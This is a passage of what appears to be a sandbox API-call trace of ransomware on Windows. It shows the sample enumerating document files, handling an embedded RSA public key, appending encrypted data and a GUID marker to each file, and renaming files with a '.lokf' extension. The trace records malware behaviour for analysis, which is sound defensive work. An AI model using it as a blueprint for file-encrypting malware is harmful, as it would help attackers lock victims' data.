RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.569] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.569] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.570] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.570] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.571] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.571] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\") returned="xw_W- RtiM1Q0r\\" [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.571] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87ea8 [0059.571] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.571] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.571] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.571] PathFindFileNameW (pszPath="") returned="" [0059.571] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.572] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.572] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d47720, ftCreationTime.dwHighDateTime=0x1d4cafa, ftLastAccessTime.dwLowDateTime=0x8164ae70, ftLastAccessTime.dwHighDateTime=0x1d4d1b2, ftLastWriteTime.dwLowDateTime=0x8164ae70, ftLastWriteTime.dwHighDateTime=0x1d4d1b2, nFileSizeHigh=0x0, nFileSizeLow=0xd956, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1y8uVRiNT7yn.odp", cAlternateFileName="1Y8UVR~1.ODP")) returned 1 [0059.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0059.572] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\1y8uVRiNT7yn.odp") returned=".odp" [0059.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\1y8uVRiNT7yn.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\1y8uvrint7yn.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.572] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55638) returned 1 [0059.572] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.574] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd930, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.574] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.575] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.575] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd956, lpOverlapped=0x0) returned 1 [0059.575] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.575] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.575] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.576] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.576] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.576] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.576] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.576] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.576] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.576] GetLastError () returned 0x0 [0059.576] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.576] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.577] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.577] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.577] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.577] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.577] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd956, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.577] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.577] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.578] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.578] CloseHandle (hObject=0x5cc) returned 1 [0059.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.579] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\1y8uVRiNT7yn.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\1y8uvrint7yn.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\1y8uVRiNT7yn.odp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\1y8uvrint7yn.odp.lokf")) returned 1 [0059.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.579] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0059.580] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a4add0, ftCreationTime.dwHighDateTime=0x1d4ca53, ftLastAccessTime.dwLowDateTime=0x66439a30, ftLastAccessTime.dwHighDateTime=0x1d4d422, ftLastWriteTime.dwLowDateTime=0x66439a30, ftLastWriteTime.dwHighDateTime=0x1d4d422, nFileSizeHigh=0x0, nFileSizeLow=0xb2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERvgLja.ots", cAlternateFileName="")) returned 1 [0059.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32698b0 [0059.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0059.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32698b0 | out: hHeap=0x660000) returned 1 [0059.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\ERvgLja.ots") returned=".ots" [0059.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\ERvgLja.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\ervglja.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.580] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=2861) returned 1 [0059.580] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.583] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.583] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.584] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.584] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb2d, lpOverlapped=0x0) returned 1 [0059.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.584] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.584] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.585] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.585] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.585] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.585] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.585] GetLastError () returned 0x0 [0059.585] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.585] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.585] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.585] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.585] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.585] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.585] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.585] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.585] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.585] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.585] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.585] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.586] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 